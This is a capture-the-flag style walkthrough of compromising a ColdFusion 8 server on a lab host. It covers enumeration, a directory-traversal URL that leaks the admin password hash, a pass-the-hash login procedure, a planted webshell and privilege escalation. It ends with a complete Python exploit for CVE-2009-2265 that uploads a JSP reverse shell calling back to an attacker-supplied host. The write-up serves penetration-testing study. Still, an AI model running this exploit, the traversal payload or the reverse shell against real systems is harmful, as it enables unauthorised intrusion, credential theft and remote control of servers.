ENUMERATION
Nmap tcp full scan
nmap -A -p- -oN nmap_tcp_all.txt 10.10.10.11
The nmap output highlighted the presence of:
fmtp?
on port 8500.msrpc
on port 135,49154:Microsoft Windows RPC
.
First thing I tried was browsing to http://10.10.10.11:8500
but it was taking too long so I thought no web server was running on the target 🙃.
Till then I never heard of fmtp
then I searched for it to gain more information about the unusual service. From eurocontrol:
Flight Message Transfer Protocol (FMTP) is a communication stack based on the transmission control and internet protocols (TCP/IP). It is used in a peer-to-peer communication context for the information exchange between flight data processing systems for the purpose of notification, coordination and transfer of flights between air traffic control units and for the purposes of civil-military cooperation.
Next step was to look for vulnerabilities present in this protocol
Results didn’t seem helpful at all. The last resort was trying null session login with rpcclient
. It was another bust.
As a reminder about ?
meaning, from nmap website:
The question mark tells us that Nmap was not even able to determine the service name through probing. As a fallback, rndc is mentioned because that has port 953 registered in
nmap services
.
That means that fmtp
was just a guess. I decided to open a tab, insert againhttp://10.10.10.11:8500
as the URL and wait while I was running again ports scans to be sure that no ports were missed the first time….a web server hosting ColdFusion was running on the target 😬.
Since I’ve already faced ColdFusion in another lab I knew /CFIDE/
directory was related to it and that in some versions you can extract the admin hash using Local File Inclusion. The plan was: get the hash, log in as admin, look for authenticated RCE.
Browsing to 10.10.10.11:8500/CFIDE/administrator/
indicated the installed version: ColdFusion 8
.
EXPLOITATION
searchsploit
highlighted how several vulnerabilities exist for this framework.
Anyway multiple vulnerabilities are related to XSS or other versions of ColdFusion. I removed them with:
searchsploit coldfusion 8 | grep -v -e Cross -e Allaire -e Database -e BlazeDS -e Credential -e Development
The list of the potential candidates was built:
- Adobe ColdFusion — Directory Traversal
EDB-ID: 14641
The exploit tries to retrieve the admin hash exploiting CVE-2010–2861. The payload is:
locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
EDB-ID: 16985 (msf)
Metaspoit module which leverages CVE-2010–2861 to extract the admin hash and then reach RCE using a scheduled task.
2. Arbitrary File Upload
EDB-ID: 45979
A .txt
which shows how to upload a shell exploiting CVE-2018–15961. The vulnerable path is /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm
.
EDB-ID: 16788 (msf)
Metaspoit module which leverages CVE-2009–2265 to upload a payload. The path to upload is :
/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm
Directory trasversal
I went down the path I already used before, then the administrator hash was retrieved using the payload indicated within EDB-ID: 14641.
http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
Identify the hash type
At this point 2 ways to use the hash were possible: crack the hash, pass the hash. Usually to identify the hash type I use hashid
, hash-identifier
or the framework documentation to look for default configuration.
Both hashid
and hash-identifier
results indicated that the hash was computed using SHA1 (which should be avoided as reported by Schneier).
Crack the hash
The cleartext password was easily found using online rainbow tables: happyday
.
In this scenario the password was simple, already cracked and available on the web. Let’s suppose the password was complex and you couldn’t crack it. There is another way to gain admin access to ColdFusion leveraging the Pass The Hash technique. That mean you don’t need the cleartext password but you can reuse the extracted hash.
Pass The Hash
If you read the source code at /CFIDE/administrator
login page, on POST
action the admin password value is computed as the HMAC of the salt and the password SHA1.
The salt is passed as the key. The password SHA1 is passed as data.
About every 30" the salt changes, in fact as reported below if you wait a while the hidden field value is different every time.
Since we could retrieve the password SHA1 it was possible to reuse the hash with the salt. The goal was to quickly generate the following value and send it as the password.
cfadminPassword.value = hmac(current_salt, admin_SHA1_LFI)
Steps:
- open burp.
- enter the extracted admin hash in the password field.
3. run javascript:hex_hmac_sha1(document.loginform.salt.value,document.loginform.cfadminPassword.value)
in the browser console to generate the salted hash.
4. copy the new generated hash.
5. set intercept on
, click the login button and modify the intercepted request replacing the cfadminPassword
value with the new one. Forward the request.
6. You are now logged in as admin.
RCE
It was time to upload a webshell. kali already has a .cfm
(ColdFusion markup) version.
Since we needed to write the webshell to a file, /CFIDE
(Logical Path) Directory Path
physical path was recorded in order to be able to access the webshell from the browser.
C:\ColdFusion8\wwwroot\CFIDE\
A new scheduled task
was created as follows:
The task was triggered by clicking on the green icon.
The shell was reachable at http://10.10.10.11:8500/CFIDE/shell.cfm
.
Running just whoami
didn’t work.
Another failed attempt with cmd
absolute path.
Also with the output redirection I couldn’t see any output 😐.
Although pinging my system was working.
I also unsuccessfully tried both certutil
to download nc.exe
and powershell.exe
to download and execute a reverse shell payload.
Server header
The server responses included the Server: JRun Web Server
header.
From JRun and Coldfusion docs JRun server seems to run also JSP
files.
So the next step was using a .jsp
reverse shell instead of a .cfm
webshell.
Triggering the reverse shell was really annoying because I had to try several times before it worked. Most of the times I got Connection Timeout
error. Finally it worked.
PRIVILEGE ESCALATION
JuicyPotato
whoami /priv
indicated it was time for our beloved JuicyPotato
.
Remember to transfer also nc
if you want to launch a reverse shell.
systeminfo
On this box no patch was applied, then kernel exploits could be a potential PE vector.
OS Name: Microsoft Windows Server 2008 R2 StandardOS Version: 6.1.7600 N/A Build 7600
MS10–059 aka Chimichurri
Between the exploits suggested by windows-exploit-suggester
this one worked.
MS10–092 (msf)
The privilege escalation was also possible using this metasploit module, as shown by ippsec.
exploit/windows/local/ms10_092_schelevator
EXTRA
Since the arbitrary file upload exploit through FCKeditor
didn’t seem complex, as an exercise I tried to write a python version of it. The exploit loads a .jsp
reverse shell.
Usage
- Start a listener.
2. Run the exploit.
3. Browse to the reverse shell payload location.
4. Receive the reverse shell.
POC
#!/usr/bin/python3
import requests
import sys
import string
import random
import urllib
# Title: FCKeditor 'CurrentFolder' Parameter Arbitrary File Upload Vulnerability
# Tested on: Coldfusion8
# CVE: 2009-2265
# Description: this exploit uploads a .jsp reverse shell leveraging FCKeditor.
if len(sys.argv) != 5:
print ('Usage: exploit.py <LHOST> <LPORT> <TARGET> <RPORT>')
print ('Example: exploit.py 10.10.10.10 445 http://10.10.10.11 8500 1')
exit(0)
lhost=sys.argv[1]
lport=sys.argv[2]
target=sys.argv[3]
rport=sys.argv[4]
payload="""
<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<%
class StreamConnector extends Thread{
InputStream dj;
OutputStream cr;
StreamConnector( InputStream dj, OutputStream cr )
{
this.dj = dj;
this.cr = cr;
}
public void run()
{
BufferedReader zf = null;
BufferedWriter qhx = null;
try
{
zf = new BufferedReader( new InputStreamReader( this.dj ) );
qhx = new BufferedWriter( new OutputStreamWriter( this.cr ) );
char buffer[] = new char[8192];
int length;
while( ( length = zf.read( buffer, 0, buffer.length ) ) > 0 )
{
qhx.write( buffer, 0, length );
qhx.flush();
}
} catch( Exception e ){}
try
{
if( zf != null )
zf.close();
if( qhx != null )
qhx.close();
} catch( Exception e ){}
}
}
try
{
String ShellPath;
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
ShellPath = new String("/bin/sh");
} else {
ShellPath = new String("cmd.exe");
}
Socket socket = new Socket( "LHOST_HERE", LPORT_HERE );
Process process = Runtime.getRuntime().exec( ShellPath );
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%>
"""
payload = payload.replace("LHOST_HERE", lhost)
payload = payload.replace("LPORT_HERE", lport)
shell_name=''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(10))
fake_filename=''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(5))
upload_uri=target+':'+rport+'/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm'
files = {'newfile': (fake_filename+'.txt', payload, 'application/x-java-archive')}
params={'Command':'FileUpload','CurrentFolder':'/'+shell_name+'.jsp%00','Type':'File'}
params_str = urllib.parse.urlencode(params, safe='%')
r = requests.post(upload_uri, params=params_str, files=files)
print ('Reverse shell location:')
print (target+':'+rport+'/CFIDE/usersfile/file/'+shell_name+'.jsp')
ColdFusion Useful Resources
LESSONS LEARNED
- don’t rush…some time you need to wait.
service?
in nmap output means that the scan wasn’t able to determine the service.- grep OR:
grep -e pattern1 -e pattern2 filename
hashid
,hash-identifier
can help to identify a hash type.- crack the hash or pass the hash.
- server response headers can give helpful information.
- ColdFusion8 interesting CVEs: CVE-2010–2861, CVE-2018–15961, CVE-2009–2265.